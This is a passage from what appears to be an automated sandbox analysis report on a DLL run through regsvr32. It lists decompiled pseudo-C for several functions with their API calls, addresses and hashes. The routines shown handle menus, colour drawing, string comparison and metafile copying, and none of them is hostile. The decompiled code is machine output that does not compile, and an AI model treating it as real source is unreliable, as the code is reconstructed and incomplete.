											_t119 = L1000A992(_t128, 0,  *(_t153 + 4));
											__eflags = _t119;
											 *(_t161 - 0x5c) = _t119;
											if(_t119 != 0) {
												_t153 = GlobalLock(_t119);
												_t121 = CopyMetaFileA( *(_t153 + 0xc), 0);
												__eflags = _t121;
												 *(_t153 + 0xc) = _t121;
												if(_t121 != 0) {
													_t153 =  *(_t161 - 0x5c);
													GlobalUnlock(_t153);
													 *(_t157 + 4) = _t153;
													 *_t157 = 0x20;
													L37:
													__eflags = 1;
												} else {
													GlobalUnlock( *(_t161 - 0x5c));
													GlobalFree( *(_t161 - 0x5c));
													goto L19;
												}
											} else {
												goto L19;
											}
										} else {
											if(_t118 == 0x20) {
												goto L8;
											}
										}
									}
								}
							}
						}
					}
				}
				return E10047739(0, _t153, _t157);
			}

0x1000b0a9
0x1000b0b0
0x1000b0b5
0x1000b0b8
0x1000b0bf
0x1000b0f8
0x1000b0fa
0x1000b0fb
0x1000b30f
0x1000b314
0x1000b316
0x00000000
0x1000b31c
0x1000b31c
0x00000000
0x1000b31c
0x1000b101
0x1000b101
0x1000b102
0x1000b2b7
0x1000b2bd
0x1000b2c2
0x1000b2c8
0x1000b2cb
0x1000b2d8
0x1000b2df
0x1000b2f3
0x1000b2f5
0x1000b300
0x1000b108
0x1000b109
0x1000b10a
0x1000b241
0x1000b24d
0x1000b250
0x1000b252
0x00000000
0x1000b258
0x1000b258
0x1000b264
0x1000b267
0x1000b26a
0x1000b276
0x1000b279
0x1000b28a
0x1000b28d
0x1000b28f
0x00000000
0x1000b295
0x1000b295
0x1000b29f
0x1000b2a3
0x1000b2a6
0x1000b2b2
0x00000000
0x1000b2b2
0x1000b28f
0x1000b110
0x1000b110
0x1000b113
0x1000b22b
0x1000b234
0x1000b239
0x1000b119
0x1000b119
0x1000b11c
0x1000b123
0x1000b126
0x00000000
0x1000b128
0x1000b12f
0x1000b13c
0x1000b13f
0x1000b11e
0x1000b11e
0x1000b121
0x00000000
0x00000000
0x00000000
0x00000000
0x1000b121
0x1000b11c
0x1000b113
0x1000b10a
0x1000b102
0x1000b0c1
0x1000b0c1
0x1000b0c5
0x1000b0c6
0x1000b0f3
0x1000b0f3
0x00000000
0x1000b0c8
0x1000b0c8
0x1000b0c9
0x1000b1dc
0x1000b1e2
0x1000b1e5
0x1000b1e7
0x1000b1e9
0x1000b1e9
0x1000b1f5
0x1000b1fc
0x1000b201
0x1000b205
0x1000b208
0x00000000
0x1000b20e
0x1000b21b
0x00000000
0x1000b220
0x1000b0cf
0x1000b0d0
0x1000b0d1
0x1000b1c5
0x1000b1c8
0x1000b1ce
0x1000b1d1
0x00000000
0x1000b0d7
0x1000b0d7
0x1000b0da
0x1000b1ae
0x1000b1b1
0x1000b1b7
0x1000b1ba
0x00000000
0x1000b0e0
0x1000b0e0
0x1000b0e3
0x1000b1a3
0x1000b0f5
0x1000b0f5
0x00000000
0x1000b0e9
0x1000b0e9
0x1000b0ec
0x1000b14a
0x1000b14f
0x1000b151
0x1000b154
0x1000b164
0x1000b16a
0x1000b170
0x1000b172
0x1000b175
0x1000b18b
0x1000b18f
0x1000b195
0x1000b198
0x1000b31f
0x1000b321
0x1000b177
0x1000b17a
0x1000b183
0x00000000
0x1000b183
0x00000000
0x00000000
0x00000000
0x1000b0ee
0x1000b0f1
0x00000000
0x00000000
0x1000b0f1
0x1000b0ec
0x1000b0e3
0x1000b0da
0x1000b0d1
0x1000b0c9
0x1000b0c6
0x1000b327

APIs

__EH_prolog3_GS.LIBCMT ref: 1000B0B0
OleDuplicateData.OLE32(?,?,00000000), ref: 1000B12F
GlobalLock.KERNEL32 ref: 1000B15E
CopyMetaFileA.GDI32(?,00000000), ref: 1000B16A
GlobalUnlock.KERNEL32(?), ref: 1000B17A
GlobalFree.KERNEL32(?), ref: 1000B183
GlobalUnlock.KERNEL32(?), ref: 1000B18F

Part of subcall function 1000B053: __EH_prolog3.LIBCMT ref: 1000B05A

lstrlenW.KERNEL32(?,0000005C), ref: 1000B1EF
CopyFileA.KERNEL32 ref: 1000B2E7

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$CopyFileUnlock$DataDuplicateFreeH_prolog3H_prolog3_LockMetalstrlen
String ID:
API String ID: 3994854817-0
Opcode ID: ba668953d9685e17340588e55c0b9598d26cef7bb434340fd5a5c565ccf174ea
Instruction ID: d9942445a5f91e600a185d9f565c7297f21d3a8cdeceab250ee44f312beabf7e
Opcode Fuzzy Hash: ba668953d9685e17340588e55c0b9598d26cef7bb434340fd5a5c565ccf174ea
Instruction Fuzzy Hash: DB818CB5900A06AFEB20CFA4CD8896EBBF9FF453847618519F46AD7658D730EC11CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10001073 Relevance: 13.7, APIs: 9, Instructions: 203
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E10001073(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* __ebp;
				signed int _t105;
				signed int _t120;
				intOrPtr _t123;
				signed int _t125;
				long _t127;
				intOrPtr _t140;
				void* _t154;
				void* _t158;
				void* _t159;
				signed int _t163;
				int _t164;
				intOrPtr _t171;
				signed int _t183;
				signed int _t185;
				short _t187;
				void* _t188;
				intOrPtr _t192;
				RECT* _t193;
				void* _t195;
				signed int _t197;
				void* _t199;
				signed long long* _t200;
				void* _t202;
				void* _t209;
				signed long long _t211;

				_t209 = __fp0;
				_t202 = __eflags;
				_t200 = _t199 - 0x74;
				_t197 = _t200 - 4;
				_t105 =  *0x100b9e70; // 0x6fb3f782
				 *(_t197 + 0x74) = _t105 ^ _t197;
				_push(0x70);
				E1004764D(0x1008dca6, __ebx, __edi, __esi);
				_t158 = __ecx;
				_push(__ecx);
				L1000CE8D(__ecx, _t197 + 0x20, __edi, __esi, _t202);
				 *(_t197 - 4) = 0;
				GetClientRect( *(_t158 + 0x20), _t197 - 0x54);
				_push(GetSysColor(0xf));
				E1000D544(_t158, _t197 - 0x28, __edi, 0, _t202);
				 *(_t197 - 4) = 1;
				FrameRect( *(_t197 + 0x24), _t197 - 0x54,  *(_t197 - 0x24));
				asm("cdq");
				_t163 = 0x18;
				_t185 = 0x18;
				 *((intOrPtr*)(_t197 - 0x18)) = 0x7fff;
				 *_t197 = 0;
				 *((intOrPtr*)(_t197 + 0x14)) = 0;
				_t164 = ( *((intOrPtr*)(_t197 - 0x4c)) -  *(_t197 - 0x54)) / _t163;
				_t120 =  *((intOrPtr*)(_t197 - 0x48)) -  *((intOrPtr*)(_t197 - 0x50));
				 *(_t197 - 0x44) = _t164;
				asm("cdq");
				_t183 = _t120 % _t185;
				 *(_t197 - 0x10) = _t120 / _t185;
				_t123 = 1;
				 *((intOrPtr*)(_t197 - 0x64)) = 1;
				 *((intOrPtr*)(_t197 - 0x5c)) = _t164 + 1;
				 *((intOrPtr*)(_t197 + 0x10)) = 1;
				while(1) {
					asm("fild dword [ebp]");
					 *((intOrPtr*)(_t197 - 0x60)) = _t123;
					 *((intOrPtr*)(_t197 - 0x58)) = _t123 +  *(_t197 - 0x10);
					_t211 = (_t209 +  *0x10099e70) *  *0x10099e60;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t125 = L10048990(_t123 +  *(_t197 - 0x10), _t211);
					_t192 =  *((intOrPtr*)(_t197 + 0x14));
					 *(_t197 - 0x14) = _t125;
					asm("fild dword [ebp-0x14]");
					 *(_t197 - 0x6c) = _t211;
					 *(_t197 + 0x1c) =  *(_t197 + 0x1c) & 0x00000000;
					 *(_t197 - 0x2c) = _t125 * _t125;
					 *((intOrPtr*)(_t197 + 0x14)) = _t192;
					do {
						_t187 =  *(_t158 + 0x74);
						_t127 = ColorHLSToRGB( *(_t197 + 0x1c), _t187,  *(_t197 - 0x14));
						 *(_t192 +  *((intOrPtr*)(_t158 + 0x58))) = _t127;
						 *(_t197 - 0x38) = _t127;
						E1001FBA9(_t197 + 0x20, _t197 - 0x7c, _t127);
						ColorRGBToHLS( *(_t158 + 0x70), _t197 + 0xc, _t197 + 8, _t197 + 0x18);
						 *(_t197 + 4) = ( *(_t197 + 0xc) & 0x0000ffff) -  *(_t197 + 0x1c);
						 *((intOrPtr*)(_t197 - 0x1c)) = ( *(_t197 + 8) & 0x0000ffff) - _t187;
						asm("fild dword [ebp-0x1c]");
						 *(_t197 - 0x20) = _t211;
						_t171 = ( *(_t197 + 0x18) & 0x0000ffff) * ( *(_t197 + 0x18) & 0x0000ffff) +  *(_t197 - 0x2c);
						 *((intOrPtr*)(_t197 - 0x30)) = _t171;
						asm("fild dword [ebp-0x30]");
						_push(_t171);
						 *(_t197 - 0x34) = _t211;
						asm("fild dword [ebp+0x4]");
						 *_t200 = _t211 *  *0x10099e50;
						L100487D0(_t183, _t171);
						 *(_t197 + 4) =  *(_t197 + 0x18) & 0x0000ffff;
						asm("fild dword [ebp+0x4]");
						asm("fmulp st1, st0");
						asm("fsubr qword [ebp-0x34]");
						_t211 =  *(_t197 - 0x20) *  *(_t197 - 0x20);
						asm("faddp st1, st0");
						_t140 = L10048990( *(_t197 + 0x18) & 0x0000ffff, _t211);
						if(_t140 <  *((intOrPtr*)(_t197 - 0x18))) {
							_t187 = _t158 + 0x60;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							 *((intOrPtr*)(_t197 - 0x18)) = _t140;
							asm("movsd");
							_t192 =  *((intOrPtr*)(_t197 + 0x14));
							 *(_t158 + 0x5c) =  *(_t197 - 0x38);
						}
						OffsetRect(_t197 - 0x7c,  *(_t197 - 0x44), 0);
						 *(_t197 + 0x1c) =  *(_t197 + 0x1c) + 0xa;
						_t192 = _t192 + 4;
						 *((intOrPtr*)(_t197 + 0x14)) = _t192;
					} while ( *(_t197 + 0x1c) < 0xf0);
					 *_t197 =  *_t197 + 1;
					 *((intOrPtr*)(_t197 + 0x10)) =  *((intOrPtr*)(_t197 + 0x10)) +  *(_t197 - 0x10);
					 *((intOrPtr*)(_t197 + 0x14)) = _t192;
					if(_t192 < 0x900) {
						_t123 =  *((intOrPtr*)(_t197 + 0x10));
						continue;
					}
					_t193 = _t158 + 0x60;
					InflateRect(_t193, 1, 1);
					_push(((0 |  *(_t158 + 0x74) - 0x000000d2 <= 0x00000000) - 0x00000001 & 0xff64c8c9) + 0xffffff);
					E1000D544(_t158, _t197 - 0x40, _t187, _t193,  *(_t158 + 0x74) - 0xd2);
					FrameRect( *(_t197 + 0x24), _t193,  *(_t197 - 0x3c));
					 *((intOrPtr*)(_t197 - 0x40)) = 0x10098308;
					L1000CFF6(_t197 - 0x40);
					 *(_t197 - 4) = 0;
					 *((intOrPtr*)(_t197 - 0x28)) = 0x10098308;
					L1000CFF6(_t197 - 0x28);
					 *(_t197 - 4) =  *(_t197 - 4) | 0xffffffff;
					_t154 = L1000CEE1(_t158, _t197 + 0x20, _t187, 0x10098308,  *(_t158 + 0x74) - 0xd2);
					 *[fs:0x0] =  *((intOrPtr*)(_t197 - 0xc));
					_pop(_t188);
					_pop(_t195);
					_pop(_t159);
					return E1004763E(_t154, _t159,  *(_t197 + 0x74) ^ _t197, _t183, _t188, _t195);
				}
			}

0x10001073
0x10001073
0x100096b4
0x100096b7
0x100096bb
0x100096c2
0x100096c5
0x100096cc
0x100096d1
0x100096d3
0x100096d7
0x100096e5
0x100096e8
0x100096f6
0x100096fa
0x10009709
0x1000970d
0x1000971b
0x1000971c
0x10009721
0x10009722
0x10009729
0x1000972c
0x1000972f
0x10009734
0x10009737
0x1000973a
0x1000973b
0x1000973d
0x10009742
0x10009744
0x10009747
0x1000974a
0x10009752
0x10009755
0x10009758
0x10009763
0x1000976c
0x10009772
0x10009773
0x10009774
0x10009775
0x10009776
0x1000977b
0x1000977e
0x10009784
0x10009787
0x1000978a
0x1000978e
0x10009791
0x10009794
0x10009797
0x1000979e
0x100097a7
0x100097ab
0x100097b5
0x100097c9
0x100097d6
0x100097df
0x100097e6
0x100097ee
0x100097f1
0x100097f4
0x100097f7
0x100097fa
0x100097fc
0x100097ff
0x10009808
0x1000980b
0x10009814
0x10009819
0x10009821
0x10009823
0x10009829
0x1000982c
0x1000982e
0x10009836
0x10009838
0x1000983e
0x1000983f
0x10009840
0x10009841
0x10009847
0x10009848
0x1000984b
0x1000984b
0x10009857
0x1000985d
0x10009861
0x1000986b
0x1000986b
0x10009877
0x1000987a
0x10009883
0x10009886
0x1000974f
0x00000000
0x1000974f
0x10009890
0x10009894
0x100098b4
0x100098b5
0x100098c1
0x100098cf
0x100098d2
0x100098da
0x100098de
0x100098e1
0x100098e6
0x100098ed
0x100098f5
0x100098fd
0x100098fe
0x100098ff
0x1000990e
0x1000990e

APIs

__EH_prolog3.LIBCMT ref: 100096CC

Part of subcall function 1000CE8D: __EH_prolog3.LIBCMT ref: 1000CE94
Part of subcall function 1000CE8D: BeginPaint.USER32(?,?), ref: 1000CEC0

GetClientRect.USER32 ref: 100096E8
GetSysColor.USER32 ref: 100096F0

Part of subcall function 1000D544: __EH_prolog3.LIBCMT ref: 1000D54B
Part of subcall function 1000D544: CreateSolidBrush.GDI32(00000000), ref: 1000D566

FrameRect.USER32 ref: 1000970D
ColorHLSToRGB.SHLWAPI(00000000,?,?), ref: 1000979E

Part of subcall function 1001FBA9: SetBkColor.GDI32(?,00000000), ref: 1001FBCA
Part of subcall function 1001FBA9: ExtTextOutA.GDI32(?,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 1001FBDE

ColorRGBToHLS.SHLWAPI(?,?,?,00007FFF), ref: 100097C9
OffsetRect.USER32 ref: 10009857
InflateRect.USER32 ref: 10009894
FrameRect.USER32 ref: 100098C1

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$Color$H_prolog3$Frame$BeginBrushClientCreateInflateOffsetPaintSolidText
String ID:
API String ID: 1932886356-0
Opcode ID: 669ed73a01831716d950bb48c875d88e21e529ccb38e26d67216ac5a66aa3097
Instruction ID: 22ac6c9c8fa047b02607a05c21a63767090b59be9aa7f4c1786ea2e733ae0667
Opcode Fuzzy Hash: 669ed73a01831716d950bb48c875d88e21e529ccb38e26d67216ac5a66aa3097
Instruction Fuzzy Hash: A6813572D00219EFDF04DFA4C985AEEBBB5FF08310F11412AF816AA251DB75AA15CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1003603A Relevance: 13.6, APIs: 9, Instructions: 142
windowCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E1003603A(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				int _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t52;
				intOrPtr* _t53;
				struct HMENU__* _t57;
				int _t58;
				int _t59;
				struct HMENU__* _t60;
				int _t62;
				int _t64;
				signed int _t66;
				int _t67;
				struct HMENU__* _t68;
				int _t70;
				intOrPtr* _t74;
				intOrPtr* _t75;
				int _t76;
				int _t77;
				struct HMENU__* _t87;
				intOrPtr _t89;

				_t78 = __ecx;
				_t75 = __ecx;
				_v8 = __ecx;
				_t52 = E10021CE5( *((intOrPtr*)(__ecx + 0x20)));
				if(_a12 == 0) {
					_t53 = __ecx + 0x80;
					_t89 = _a4;
					if( *_t53 == 0) {
						L3:
						_t94 = _t89;
						if(_t89 == 0) {
							E1000A069(_t75, _t78, 0, _t89, _t94);
						}
						L10010B4E( &_v48);
						_v36 = _t89;
						if( *((intOrPtr*)(E1001DD4F(_t75, 0, _t89, _t94) + 0x78)) !=  *(_t89 + 4)) {
							_t57 = GetMenu( *(_t75 + 0x20));
							__eflags = _t57;
							if(_t57 == 0) {
								goto L16;
							}
							_t82 = _t75;
							_t68 = E10015912(_t75, _t75, GetMenu);
							__eflags = _t68;
							if(_t68 == 0) {
								goto L16;
							}
							_t87 = GetMenu( *(_t68 + 0x20));
							__eflags = _t87;
							if(_t87 == 0) {
								goto L16;
							}
							_t70 = GetMenuItemCount(_t87);
							_t77 = 0;
							__eflags = _t70;
							_a12 = _t70;
							if(_t70 <= 0) {
								L15:
								_t75 = _v8;
								goto L16;
							} else {
								goto L11;
							}
							while(1) {
								L11:
								__eflags = GetSubMenu(_t87, _t77) -  *(_t89 + 4);
								if(__eflags == 0) {
									break;
								}
								_t77 = _t77 + 1;
								__eflags = _t77 - _a12;
								if(_t77 < _a12) {
									continue;
								}
								goto L15;
							}
							_push(_t87);
							_v12 = E1001E527(_t77, _t82, _t87, _t89, __eflags);
							goto L15;
						} else {
							_v12 = _t89;
							L16:
							_t58 = GetMenuItemCount( *(_t89 + 4));
							_v40 = _v40 & 0x00000000;
							_v16 = _t58;
							if(_t58 <= 0) {
								L36:
								return _t58;
							}
							do {
								_t59 = GetMenuItemID( *(_t89 + 4), _v40);
								_v44 = _t59;
								if(_t59 == 0) {
									goto L35;
								}
								if(_t59 != 0xffffffff) {
									_v32 = _v32 & 0x00000000;
									__eflags =  *(_t75 + 0x54);
									if( *(_t75 + 0x54) == 0) {
										L27:
										_t60 = 0;
										__eflags = 0;
										L28:
										_push(_t60);
										L29:
										_push(_t75);
										L10010B74( &_v48);
										_t62 = GetMenuItemCount( *(_t89 + 4));
										_t76 = _t62;
										if(_t76 >= _v16) {
											L34:
											_v16 = _t76;
											_t75 = _v8;
											goto L35;
										}
										_v40 = _v40 + _t62 - _v16;
										while(_v40 < _t76) {
											_t64 = GetMenuItemID( *(_t89 + 4), _v40);
											__eflags = _t64 - _v44;
											if(_t64 != _v44) {
												goto L34;
											}
											_t43 =  &_v40;
											 *_t43 = _v40 + 1;
											__eflags =  *_t43;
										}
										goto L34;
									}
									__eflags = _t59 - 0xf000;
									if(_t59 >= 0xf000) {
										goto L27;
									}
									_t60 = 1;
									goto L28;
								}
								_t66 = L1001276D(_t89, _v40);
								_v32 = _t66;
								if(_t66 == 0) {
									goto L35;
								}
								_t67 = GetMenuItemID( *(_t66 + 4), 0);
								_v44 = _t67;
								if(_t67 != 0 && _t67 != 0xffffffff) {
									_push(0);
									goto L29;
								}
								L35:
								_v40 = _v40 + 1;
								_t58 = _v40;
							} while (_t58 < _v16);
							goto L36;
						}
					}
					_t74 =  *_t53;
					_t78 = _t74;
					_t58 =  *((intOrPtr*)( *_t74 + 0x74))(_t89, _a8, 0);
					if(_t58 != 0) {
						goto L36;
					}
					goto L3;
				}
				return _t52;
			}

0x1003603a
0x10036041
0x10036047
0x1003604a
0x10036054
0x1003605a
0x10036063
0x10036066
0x1003607e
0x1003607e
0x10036080
0x10036082
0x10036082
0x1003608a
0x1003608f
0x1003609d
0x100360ad
0x100360af
0x100360b1
0x00000000
0x00000000
0x100360b3
0x100360b5
0x100360ba
0x100360bc
0x00000000
0x00000000
0x100360c3
0x100360c5
0x100360c7
0x00000000
0x00000000
0x100360ca
0x100360d0
0x100360d2
0x100360d4
0x100360d7
0x100360f7
0x100360f7
0x00000000
0x00000000
0x00000000
0x00000000
0x100360d9
0x100360d9
0x100360e1
0x100360e4
0x00000000
0x00000000
0x100360e6
0x100360e7
0x100360ea
0x00000000
0x00000000
0x00000000
0x100360ec
0x100360ee
0x100360f4
0x00000000
0x1003609f
0x1003609f
0x100360fa
0x100360fd
0x10036103
0x10036109
0x1003610c
0x100361bc
0x00000000
0x100361bc
0x10036118
0x1003611e
0x10036122
0x10036125
0x00000000
0x00000000
0x1003612e
0x10036158
0x1003615c
0x10036160
0x1003616e
0x1003616e
0x1003616e
0x10036170
0x10036170
0x10036171
0x10036171
0x10036175
0x1003617d
0x10036183
0x10036188
0x100361a7
0x100361a7
0x100361aa
0x00000000
0x100361aa
0x1003618d
0x100361a2
0x10036198
0x1003619a
0x1003619d
0x00000000
0x00000000
0x1003619f
0x1003619f
0x1003619f
0x1003619f
0x00000000
0x100361a2
0x10036162
0x10036167
0x00000000
0x00000000
0x1003616b
0x00000000
0x1003616b
0x10036135
0x1003613c
0x1003613f
0x00000000
0x00000000
0x10036146
0x1003614a
0x1003614d
0x10036154
0x00000000
0x10036154
0x100361ad
0x100361ad
0x100361b0
0x100361b3
0x00000000
0x10036118
0x1003609d
0x10036068
0x10036070
0x10036073
0x10036078
0x00000000
0x00000000
0x00000000
0x10036078
0x100361c0

APIs

Part of subcall function 10021CE5: GetFocus.USER32 ref: 10021CE6
Part of subcall function 10021CE5: GetParent.USER32(00000000), ref: 10021D0F
Part of subcall function 10021CE5: GetWindowLongA.USER32(?,000000F0), ref: 10021D2A
Part of subcall function 10021CE5: GetParent.USER32(?), ref: 10021D38
Part of subcall function 10021CE5: GetDesktopWindow.USER32 ref: 10021D3C
Part of subcall function 10021CE5: SendMessageA.USER32 ref: 10021D50

GetMenu.USER32 ref: 100360AD
GetMenu.USER32 ref: 100360C1
GetMenuItemCount.USER32(00000000), ref: 100360CA
GetSubMenu.USER32 ref: 100360DB
GetMenuItemCount.USER32(?), ref: 100360FD
GetMenuItemID.USER32(?,00000000), ref: 1003611E
GetMenuItemID.USER32(?,00000000), ref: 10036146
GetMenuItemCount.USER32(?), ref: 1003617D
GetMenuItemID.USER32(?,00000000), ref: 10036198

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
String ID:
API String ID: 4186786570-0
Opcode ID: 215bee6ecb53b4c225743098e316efb829d5df27b4eb84ff5d733d48bfd6073a
Instruction ID: 46843a0fe4c7dd88824f739b3fce7bef7ece51828467e3b86497c45affe004c6
Opcode Fuzzy Hash: 215bee6ecb53b4c225743098e316efb829d5df27b4eb84ff5d733d48bfd6073a
Instruction Fuzzy Hash: 3E516A35900209DFDB12DFA4CD85A9EBBF5FF4C382F258565E816AA162DB31ED40DB20

Uniqueness

Uniqueness Score: -1.00%

Function 1002942E Relevance: 13.6, APIs: 9, Instructions: 85
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E1002942E(void* __esi, char* _a4, int _a8) {
				signed int _v8;
				short _v528;
				short _v1048;
				short _v1568;
				int _v1572;
				char* _v1576;
				void* __ebx;
				void* __edi;
				signed int _t20;
				int _t23;
				void* _t26;
				char* _t35;
				int _t37;
				void* _t42;
				char* _t43;
				void* _t47;
				signed int _t49;

				_t44 = __esi;
				_t20 =  *0x100b9e70; // 0x6fb3f782
				_v8 = _t20 ^ _t49;
				_t37 = _a8;
				_t43 = _a4;
				_v1576 = _t37;
				if(lstrcmpiA(_t43, _t37) == 0) {
					_t23 = GetSystemMetrics(0x2a);
					if(_t23 != 0) {
						_push(__esi);
						_v1572 = lstrlenA(_t43);
						if(_v1572 != lstrlenA(_t37)) {
							L13:
							_t26 = 0;
						} else {
							_t37 = GetThreadLocale();
							GetStringTypeA(_t37, 1, _t43, 0xffffffff,  &_v1568);
							GetStringTypeA(_t37, 4, _t43, 0xffffffff,  &_v528);
							GetStringTypeA(_t37, 1, _v1576, 0xffffffff,  &_v1048);
							_t35 = _t43;
							if( *_t43 == 0) {
								L10:
								_t26 = 1;
							} else {
								_t47 = 0;
								while(( *(_t49 + _t47 - 0x20c) & 0x00000080) == 0 ||  *((intOrPtr*)(_t49 + _t47 - 0x61c)) ==  *((intOrPtr*)(_t49 + _t47 - 0x414))) {
									_t47 = _t47 + 2;
									if( *_t35 != 0) {
										continue;
									} else {
										goto L10;
									}
									goto L11;
								}
								goto L13;
							}
						}
						L11:
						_pop(_t44);
					} else {
						_t26 = _t23 + 1;
					}
				} else {
					_t26 = 0;
				}
				return E1004763E(_t26, _t37, _v8 ^ _t49, _t42, _t43, _t44);
			}

0x1002942e
0x10029437
0x1002943e
0x10029442
0x10029446
0x1002944b
0x10029459
0x10029464
0x1002946c
0x10029474
0x1002947f
0x1002948d
0x1002951a
0x1002951a
0x10029493
0x1002949f
0x100294ae
0x100294bd
0x100294d1
0x100294d6
0x100294d8
0x10029506
0x10029508
0x100294da
0x100294da
0x100294dc
0x100294fa
0x10029504
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10029504
0x00000000
0x100294dc
0x100294d8
0x10029509
0x10029509
0x1002946e
0x1002946e
0x1002946e
0x1002945b
0x1002945b
0x1002945b
0x10029517

APIs

lstrcmpiA.KERNEL32(?,00000000,00000000), ref: 10029451
GetSystemMetrics.USER32 ref: 10029464

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: MetricsSystemlstrcmpi
String ID:
API String ID: 2335526769-0
Opcode ID: c28886dce3c898e687dc4c2d76ad89fb83670343aa9dee684a9b6afb0d406b45
Instruction ID: ec0d1c6a6b6d5934df8a485b178ddfb646fdcce51f2dd72e4357131ab1d54fac
Opcode Fuzzy Hash: c28886dce3c898e687dc4c2d76ad89fb83670343aa9dee684a9b6afb0d406b45
Instruction Fuzzy Hash: 29210871A00269AAEB11DF749C84FDB7BEDEB4A7A0F6002A1FD16D21C1DA749D41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 100253FF Relevance: 13.6, APIs: 9, Instructions: 79
threadCOMMON

Download Yara Rule

C-Code - Quality: 61%

